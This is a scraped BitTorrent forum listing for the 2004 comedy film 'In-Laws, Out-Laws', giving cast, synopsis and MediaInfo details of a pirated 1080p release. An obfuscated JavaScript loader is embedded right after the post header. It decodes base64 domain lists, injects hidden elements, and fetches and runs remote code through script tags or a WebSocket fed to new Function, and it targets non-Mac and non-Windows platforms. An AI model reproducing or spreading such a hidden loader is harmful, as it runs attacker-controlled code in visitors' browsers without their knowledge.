外来媳妇本地郎[天马修复版+国粤双语+简繁英中字].迅雷下载.In-Laws,.Out-Laws.2004.WEB-DL.1080p

版主小s 1月前 471

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 外来媳妇本地郎 / 我的大嚿父母 / 皆大欢喜 / In-Laws, Out-Laws

◎年 代 2004

◎产 地 中国大陆 / 中国香港

◎类 别 喜剧

◎语 言 粤语

◎上映日期 2004-01-04(中国大陆) / 2004-01-08(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0415177/

◎豆瓣评分 5.8/10 (1023人评价)

◎豆瓣链接 https://movie.douban.com/subject/1863369/

◎片 长 100分钟

◎导 演 高志森 Clifton Ko (id:1281025)

◎编 剧 许丹华 Dan-Wah Hui (id:1402531)

王丹丹 Tan Tan Wang (id:1402533)

王萍 Ping Wang (id:1402532)

◎演 员 曾志伟 Eric Tsang (id:1002862)

沈殿霞 Lydia Shum (id:1159493)

郭昶 Chang Guo (id:1275304)

黄霑 James Wong (id:1008091)

余文乐 Shawn Yue (id:1041510)

蒋怡 Coco Chiang (id:1045679)

苏志丹 Zhidan Su (id:1316398)

虎艳芬 Yanfen Hu (id:1316397)

彭新智 Xinzhi Peng (id:1316039)

丁玲 Ling Ding (id:1316897)

黄日华 Felix Wong (id:1050735)

张敬轩 Hins Cheung (id:1275778)

卢淑仪 Monica Lo (id:1199198)

钟雯 wendy (id:1367390)

吴苏妹 Sumei Wu (id:1380462)

李俊毅 Junyi Li (id:1316901)

吴瑕 Xia Wu (id:1405184)

◎标 签 喜剧 / 香港 / 香港电影 / 曾志伟 / 2004 / 沈殿霞 / 余文乐 / 中国

◎简 介

本片是多次勇夺广东地区收视冠军的同名千集电视长剧的贺岁电影版。

广州西关康家大院疑似发现古文物遗址,一家人听到政府许诺会作出巨额补偿时,喜出望外。家庭会议上,康嫂(沈殿霞)宣布她拟将补偿金分作四分,自己以及三个儿子阿光(苏志丹)、阿宗(郭昶)和阿耀每人各一,但尚没成家或离婚的那份,暂由她保管。二十年前携带幼子阿祖(余文乐)离开康嫂去香港淘金的康伯(曾志伟)看过新闻,也回到广州欲分一杯羹。紧接,这一家便如炸开了锅:康叔想着不久就有大钱拿,借诸多老街坊的保命钱将家里置换一新;最贪财的阿宗和阿婵(虎艳芬)两夫妻决定拿到钱再离婚;阿光和阿耀虽不视钱如命,但有钱总比没钱好,于是急着带外地女友见家长——因为康嫂规定不准讨外地人做老婆,他们为讨她欢心可谓大费周章;阿祖更要命,他喜欢上的女孩(蒋怡)竟是个山东人与韩国人的混血儿,不但自己很能打,还有个非常能打的老爸(...

  1. General

  2. Unique ID : 86343377992656575001317350460633626900 (0x40F521352B87465874CE4F608423B914)

  3. Complete name : In-Laws,.Out-Laws.2004.WEB-DL.1080p.H265.AAC.2Audios-Dave.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 3.05 GiB

  7. Duration : 1 h 28 min

  8. Overall bit rate : 4 919 kb/s

  9. Encoded date : UTC 2021-06-19 15:37:15

  10. Writing application : mkvmerge v19.0.0 ('Brave Captain') 64-bit

  11. Writing library : libebml v1.3.5 + libmatroska v1.4.8


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@High

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 28 min

  19. Bit rate : 4 660 kb/s

  20. Width : 1 920 pixels

  21. Height : 1 080 pixels

  22. Display aspect ratio : 16:9

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.094

  29. Stream size : 2.89 GiB (95%)

  30. Default : Yes

  31. Forced : No


  32. Audio #1

  33. ID : 2

  34. Format : AAC LC SBR

  35. Format/Info : Advanced Audio Codec Low Complexity with Spectral Band Replication

  36. Commercial name : HE-AAC

  37. Format settings : Explicit

  38. Codec ID : A_AAC-2

  39. Duration : 1 h 28 min

  40. Bit rate : 128 kb/s

  41. Channel(s) : 2 channels

  42. Channel layout : L R

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 23.438 FPS (2048 SPF)

  45. Compression mode : Lossy

  46. Stream size : 81.4 MiB (3%)

  47. Title : 国语

  48. Language : Chinese

  49. Default : Yes

  50. Forced : No


  51. Audio #2

  52. ID : 3

  53. Format : AAC LC SBR

  54. Format/Info : Advanced Audio Codec Low Complexity with Spectral Band Replication

  55. Commercial name : HE-AAC

  56. Format settings : Explicit

  57. Codec ID : A_AAC-2

  58. Duration : 1 h 28 min

  59. Bit rate : 128 kb/s

  60. Channel(s) : 2 channels

  61. Channel layout : L R

  62. Sampling rate : 48.0 kHz

  63. Frame rate : 23.438 FPS (2048 SPF)

  64. Compression mode : Lossy

  65. Stream size : 81.4 MiB (3%)

  66. Title : 粤语

  67. Language : Chinese

  68. Default : No

  69. Forced : No


  70. Text #1

  71. ID : 4

  72. Format : UTF-8

  73. Codec ID : S_TEXT/UTF8

  74. Codec ID/Info : UTF-8 Plain Text

  75. Duration : 1 h 24 min

  76. Bit rate : 65 b/s

  77. Count of elements : 1705

  78. Stream size : 40.6 KiB (0%)

  79. Title : 简体中文

  80. Language : Chinese

  81. Default : Yes

  82. Forced : No


  83. Text #2

  84. ID : 5

  85. Format : UTF-8

  86. Codec ID : S_TEXT/UTF8

  87. Codec ID/Info : UTF-8 Plain Text

  88. Duration : 1 h 24 min

  89. Bit rate : 65 b/s

  90. Count of elements : 1705

  91. Stream size : 40.6 KiB (0%)

  92. Title : 繁体中文

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #3

  97. ID : 6

  98. Format : UTF-8

  99. Codec ID : S_TEXT/UTF8

  100. Codec ID/Info : UTF-8 Plain Text

  101. Duration : 1 h 24 min

  102. Bit rate : 72 b/s

  103. Count of elements : 1705

  104. Stream size : 44.6 KiB (0%)

  105. Title : 英文

  106. Language : English

  107. Default : No

  108. Forced : No




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 喜剧

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回